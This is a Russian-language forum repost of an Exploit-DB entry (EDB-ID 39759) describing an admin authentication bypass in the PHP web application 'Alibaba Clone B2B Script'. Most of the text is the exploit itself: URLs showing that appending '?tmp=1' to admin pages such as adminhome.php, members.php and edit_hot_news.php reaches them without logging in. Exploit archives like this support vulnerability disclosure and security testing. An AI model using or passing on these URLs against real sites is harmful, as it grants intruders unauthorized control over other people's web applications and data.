Exploit Alibaba Clone B2B Script - Admin Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39759
Проверка EDB
  1. Пройдено
Автор
MEISAM MONSEF
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2016-05-04
Alibaba Clone B2B Script - Admin Authentication Bypass
Код:
# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Date: 2016-05-03
# Exploit Author: Meisam Monsef [email protected] or [email protected]
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions

Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1

For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1

or add a new news :
http://server/admin/hot_news_menu.php?tmp=1

or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1
 
Источник
www.exploit-db.com

Похожие темы